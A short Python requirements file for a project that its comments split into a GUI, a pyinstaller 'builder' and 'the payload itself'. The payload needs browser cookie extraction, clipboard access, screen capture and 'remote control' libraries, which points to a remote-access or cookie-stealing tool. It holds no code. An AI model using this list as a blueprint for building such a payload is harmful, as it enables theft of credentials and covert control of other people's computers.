# For the GUI
customtkinter
requests
websockets  # For live communication
Pillow      # For image processing

# For the builder
pyinstaller

# For the payload itself (needed by the builder)
psutil
pycryptodomex
pywin32
pyperclip
browser-cookie3
mss         # For screen capture
pyautogui   # For remote control
websockets
Pillow